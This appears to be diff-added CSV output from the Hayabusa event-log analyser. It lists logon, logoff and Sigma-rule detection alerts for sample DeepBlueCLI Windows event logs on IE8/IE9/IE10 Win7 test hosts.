+2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x12048  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x12070  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x131c3  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x13216  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x36aed  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x36b1d  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x11c02  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x11c32  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x170f5  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x17125  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1ac86  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1b245  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1a23a  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1a265  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1e056  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1e3c9  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x6831f  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x6832b  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
